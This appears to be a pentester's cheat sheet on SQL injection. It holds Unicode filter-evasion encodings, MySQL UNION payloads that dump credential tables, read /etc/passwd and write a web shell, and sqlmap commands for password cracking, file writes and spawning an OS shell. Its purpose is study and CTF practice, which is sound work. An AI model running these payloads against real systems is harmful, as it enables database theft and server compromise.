SQL Injection (SQLi)
Introduction
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
It generally allows an attacker to view data that they are not normally able to retrieve.
This might include data belonging to other users, or any other data that the application itself is able to access.
In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
In some situations, an attacker can escalate a SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.
Useful Resources
Finding a SQLi attack vector
Whenever faced with user-input, you can check if the target is vulnerable to SQLi by using the following inputs Note that in some cases you may be facing a blind SQLi, which means that you won't be able to "see" any error messages
Take care when injecting the condition OR 1=1 into a SQL query. Even if it appears to be harmless in the context you're injecting into, it's common for applications to use data from a single request in multiple different queries. If your condition reaches an UPDATE or DELETE statement, for example, it can result in an accidental loss of data.
SQL Injection Filter Evasion - Unicode Normalization
Unicode normalization is a process that ensures different binary representations of characters are standardized to the same binary value. This process is crucial in dealing with strings in programming and data processing
You can find a great article here: https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/
Depending on how the back-end/front-end is behaving when it receives weird unicode characters an attacker might be able to bypass protections and inject arbitrary characters.
You can use the following payloads to try and trigger a SQLi whenever you are facing any filters. Sometimes, unicode normalization even allows bypassing WAFs in place.
Other characters can be found at:
| Character | Unicode Normalization |
|---|---|
o | %e1%b4%bc |
r | %e1%b4%bf |
1 | %c2%b9 |
= | %e2%81%bc |
/ | %ef%bc%8f |
- | %ef%b9%a3 |
# | %ef%b9%9f |
* | %ef%b9%a1 |
' | %ef%bc%87 |
" | %ef%bc%82 |
| | %ef%bd%9c |
UNION-Based SQL Injection Payloads
| Payload | Description |
|---|---|
' order by 1-- - | Detect number of columns using order by |
cn' UNION select 1,2,3-- - | Detect number of columns using Union injection |
cn' UNION select 1,@@version,3,4-- - | Basic Union injection |
UNION select username, 2, 3, 4 from passwords-- - | Union injection for 4 columns |
cn' UNION select 1,database(),2,3-- - | Current database name |
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - | List all databases |
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - | List all tables in a specific database |
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - | List all columns in a specific table |
cn' UNION select 1, username, password, 4 from dev.credentials-- - | Dump data from a table in another database |
cn' UNION SELECT 1, user(), 3, 4-- - | Find current user |
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - | Find if user has admin privileges |
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- - | Find if all user privileges |
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - | Find which directories can be accessed through MySQL |
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - | Read local file |
select 'file written successfully!' into outfile '/var/www/html/proof.txt' | Write a string to a local file |
cn' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- - | Write a web shell into the base web directory |
SQL Injection Payloads Lists
SQLMap Basics
| Command | Description |
|---|---|
sqlmap -h | View the basic help menu |
sqlmap -hh | View the advanced help menu |
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch | Run SQLMap without asking for user input |
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' | SQLMap with POST request |
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' | POST request specifying an injection point with an asterisk |
sqlmap -r req.txt | Passing an HTTP request file to SQLMap |
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' | Specifying a cookie header |
sqlmap -u www.target.com --data='id=1' --method PUT | Specifying a PUT request |
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt | Store traffic to an output file |
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch | Specify verbosity level |
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" | Specifying a prefix or suffix |
sqlmap -u www.example.com/?id=1 -v 3 --level=5 | Specifying the level and risk |
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba | Basic DB enumeration |
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb | Table enumeration |
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname | Table/row enumeration |
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" | Conditional enumeration |
sqlmap -u "http://www.example.com/?id=1" --schema | Database schema enumeration |
sqlmap -u "http://www.example.com/?id=1" --search -T user | Searching for data |
sqlmap -u "http://www.example.com/?id=1" --passwords --batch | Password enumeration and cracking |
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" | Anti-CSRF token bypass |
sqlmap --list-tampers | List all tamper scripts |
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba | Check for DBA privileges |
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" | Reading a local file |
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" | Writing a file |
sqlmap -u "http://www.example.com/?id=1" --os-shell | Spawning an OS shell |
Second Order SQLi
Second-order SQL injection arises when user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way. To detect the vulnerability, it is normally necessary to submit suitable data in one location, and then use some other application function that processes the data in an unsafe way
One example of second order SQLi is the following i faced during a CTF challenge:
The target web application's registration form suffered from SQLi
After registering a user, a specific field inside the user profile showed the result of the SQL injection
To achieve a second-order SQLi with sqlmap i used the following:
sqlmap -r req --batch --dump --risk 3 --level 5 --second-req req2 --dbms=mysql --tamper=space2comment --dump
NoSQL Injection
NoSQL databases provide looser consistency restrictions than traditional SQL databases.
By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits.
Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
Useful External Resources:
Last updated